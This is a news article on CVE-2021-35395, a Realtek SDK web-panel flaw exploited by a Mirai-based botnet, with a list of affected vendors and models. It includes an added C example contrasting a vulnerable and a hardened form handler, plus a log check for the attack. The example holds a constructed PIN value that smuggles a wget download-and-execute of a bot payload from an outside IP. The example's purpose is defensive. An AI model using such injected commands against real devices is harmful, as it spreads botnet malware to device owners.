Hundreds of thousands of Realtek-based devices under attack from IoT botnet
A dangerous vulnerability in Realtek chipsets used in hundreds of thousands of smart devices from at least 65 vendors is currently under attack from a notorious DDoS botnet gang.
The attacks started last week, according to a report from IoT security firm SAM Seamless Network, just three days after fellow security firm IoT Inspector published details about the vulnerability on its blog.
Vulnerability impacts a little-known but very popular Realtek SoC
Tracked as CVE-2021-35395, the vulnerability is one of four issues IoT Inspector researchers found in the software development kit (SDK) that ships with multiple Realtek system-on-chip (SoC) families.
Realtek manufactures these chips and sells them to other companies, which build their own devices around the SoC and use the Realtek SDK as the starting point and configuration layer for their own firmware.
IoT Inspector said they found more than 200 different device models from at least 65 different vendors that had been built around these chips and were using the vulnerable SDK.
Estimated in the realm of hundreds of thousands of internet-connected devices, the list of vulnerable items includes routers, network gateways, Wi-Fi repeaters, IP cameras, smart lighting, and even internet-connected toys.
Of the four issues discovered by the IoT Inspector research team, CVE-2021-35395 received the highest severity rating, a CVSS v3 score of 9.8 out of 10.
According to the research team, the vulnerability resides in the SDK's web management interface, which vendors commonly ship as the device's configuration panel. A remote attacker who can reach that interface can send requests with crafted parameters that the form handlers pass on without proper checks, bypass authentication, and execute code as root, effectively taking over the device. How much protection stands in front of those handlers depends on the vendor: some ship the SDK web server as-is, others add their own authentication layer, so exploitability varies from device to device.
While Realtek released patches [PDF] before IoT Inspector published its findings last week, the patched SDK still has to be integrated by each device vendor into its own firmware and then pushed to customers, and that window was far too short for this to happen.
This means that today the vast majority of these devices are still running outdated firmware (and an outdated Realtek SDK) and remain exposed to attacks.
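The bug class described above, a web-panel form handler that pastes a request parameter into a shell command run as root, next to a hardened handler, as an added example. This is not code from the Realtek SDK, IoT Inspector or SAM; the handler names, the `/sbin/wps_helper` path and the PIN parameter are hypothetical, and the attacker input is constructed.

```c
/* Added example, not Realtek SDK code. Models the article's bug class:
 * a form handler that builds a root shell command from a request parameter.
 * All names (build_cmd_*, "/sbin/wps_helper", the PIN parameter) are
 * hypothetical. */
#include <ctype.h>
#include <stdio.h>
#include <string.h>

#define CMD_MAX 128

/* Shared buffer so the demo and any caller can inspect the command built. */
char cmd_buf[CMD_MAX];

/* Vulnerable pattern: the parameter value goes into the command line verbatim.
 * A value such as "12345678; wget http://x/bot -O /tmp/b; sh /tmp/b" becomes
 * a second command. The real SDK handler hands this to system() as root; here
 * we only build the string so the example is safe to run. The SDK code also
 * used unbounded sprintf/strcpy into stack buffers (the overflow half of the
 * CVE); snprintf is used here so the example stays memory-safe. */
int build_cmd_vulnerable(const char *pin, char *out, size_t outlen)
{
    int n = snprintf(out, outlen, "/sbin/wps_helper -pin %s", pin);
    return (n < 0 || (size_t)n >= outlen) ? -1 : 0;
}

/* Hardened pattern: validate against a strict allowlist before any command
 * string exists. A WPS PIN is 4 or 8 decimal digits, nothing else. The better
 * fix is to drop the shell entirely and call the function directly or use
 * execve() with an argv array, which makes metacharacters meaningless. */
int build_cmd_hardened(const char *pin, char *out, size_t outlen)
{
    size_t len = strlen(pin);
    if (len != 4 && len != 8)
        return -1;
    for (size_t i = 0; i < len; i++)
        if (!isdigit((unsigned char)pin[i]))
            return -1;
    int n = snprintf(out, outlen, "/sbin/wps_helper -pin %s", pin);
    return (n < 0 || (size_t)n >= outlen) ? -1 : 0;
}

/* Triage helper for access logs or packet captures: returns 1 if a form
 * parameter value carries shell metacharacters, which a real PIN never does. */
int looks_like_injection(const char *value)
{
    return strpbrk(value, ";|&`$<>\n") != NULL;
}

int main(void)
{
    /* Constructed attacker input: a valid-looking PIN followed by a command
     * that fetches and runs a bot payload, the shape a Mirai dropper uses. */
    const char *payload =
        "12345678; wget http://203.0.113.5/bot -O /tmp/b; sh /tmp/b";

    if (build_cmd_vulnerable(payload, cmd_buf, sizeof cmd_buf) == 0)
        printf("vulnerable handler would run: %s\n", cmd_buf);

    printf("hardened handler accepts payload: %s\n",
           build_cmd_hardened(payload, cmd_buf, sizeof cmd_buf) == 0 ? "yes" : "no");
    printf("hardened handler accepts 12345678: %s\n",
           build_cmd_hardened("12345678", cmd_buf, sizeof cmd_buf) == 0 ? "yes" : "no");
    printf("payload flagged by log check: %d\n", looks_like_injection(payload));
    return 0;
}
```

The allowlist check is the cheap, retrofittable fix a vendor can apply in its own firmware build; removing the shell (direct function call or `execve()` with an argument vector) is the structural fix. The `looks_like_injection` check is the same test a defender can run over captured form parameters when hunting for exploitation attempts against a device whose vendor has not yet shipped an update.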
A very busy botnet
Per SAM, exploitation started shortly after the disclosure and came from the same Mirai-based botnet that a week earlier rushed to exploit a similar mega-bug (CVE-2021-20090) in millions of routers running Arcadyan-based firmware.
The SAM research team said that based on their own scans, the most common device models currently running the vulnerable Realtek SDK include the likes of:
- Netis E1+ extender
- Edimax N150 and N300 Wi-Fi router
- Repotec RP-WR5444 router
Owners of such devices should check with their vendors or sellers for new firmware patches. The full list of vulnerable devices compiled by IoT Inspector is included below:
| Vendor | Affected models |
|---|---|
| A-Link Europe Ltd | A-Link WNAP WNAP(b) |
| ARRIS Group, Inc | VAP4402_CALA |
| Abocom System Inc. | Wireless Router ? |
| AIgital | Wifi Range Extenders |
| ASUSTek Computer Inc. | RT-Nxx models, WL330-NUL; Wireless WPS Router RT-N10E, RT-N10LX, RT-N12E, RT-N12LX |
| BEST ONE TECHNOLOGY CO., LTD. | AP-BNC-800 |
| Beeline | Smart Box v1 |
| Belkin (inferred, see note) | AC1200DB Wireless Router F9K1113 v4, AC1200FE Wireless Router F9K1123, AC750 Wireless Router F9K1116 |
| China Mobile Communication Corp. | AN1202L |
| Compal Broadband Networks, INC. | CH66xx cable modem line |
| D-Link | DIR-XXX models based on rlx-linux, DAP-XXX models based on rlx-linux, DIR-300, DAP-1360 B1, DSL-2640U, DSL_2640U, VoIP Router DVG-2102S, VoIP Router DVG-5004S, VoIP Router DVG-N5402GF, VoIP Router DVG-N5402SP, VoIP Router DVG-N5412SP, Wireless VoIP Device DVG-N5402SP |
| Davolink Inc. | DVW2700 1 |
| Edge-core | VoIP Router ECG4510-05E-R01 |
| Edimax (inferred, see note) | Wireless Router BR-6428nS, N150 Wireless Router BR6228GNS, N300 Wireless Router BR6428NS |
| EnGenius Technologies, Inc. | 11N Wireless Router, Wireless AP Router |
| Esson Technology Inc. | Wifi Module ESM8196, https://fccid.io/RKOESM8196 (therefore any device using this wifi module) |
| EZ-NET Ubiquitous Corp. | NEXT-7004N |
| Hawking Technologies, Inc. | HAWNR3 |
| I-O DATA DEVICE, INC. | WN-AC1167R |
| LG International | Axler Router LGI-R104N, LGI-R104T, LGI-X501, LGI-X502, LGI-X503, LGI-X601, LGI-X602, Axler Router RT-DSE |
| LINK-NET TECHNOLOGY CO., LTD. | LW-N664R2 |
| Occtel | VoIP Router ODC201AC, OGC200W, ONC200W, SP300-DS, SP5220SO, SP5220SP |
| Omega Technology | Wireless N Router O31 OWLR151U, Wireless N Router O70 OWLR307U |
| (vendor not given in the list) | Axler Router R104, R3, X503, X603; LotteMart Router 104L, 502L, 503L |
| PLANEX COMMUNICATIONS INC. (Planex Communications Corp.) | (models not specified) |
| Sitecom Europe BV | Sitecom Wireless Gigabit Router WLR-4001, Sitecom Wireless Router 150N X1 150N, 300N X2 300N, 300N X3 300N |
| Sercomm Corp. | Telmex Infinitum |
| Shenzhen Yichen (JCG) Technology Development Co., Ltd. | JYR-N490 |
| Skyworth Digital Technology. | Mesh Router |
| Tenda | AC6, AC10, W6, W9, i21 |
| TRENDnet Technology, Corp. | (models not specified) |
| ZyXEL (inferred, see note) | NBG-416N AP Router, NBG-418N AP Router |

Note: the vendor names for the Belkin, Edimax and ZyXEL rows were missing from the list as extracted and are inferred from the model numbering (Belkin F9K1xxx, Edimax BR-6xxx, ZyXEL NBG-4xx). One group of Axler and LotteMart routers had no vendor attached and is listed without one.
Catalin Cimpanu is a cybersecurity reporter for The Record. He previously worked at ZDNet and Bleeping Computer, where he became a well-known name in the industry for his constant scoops on new vulnerabilities, cyberattacks, and law enforcement actions against hackers.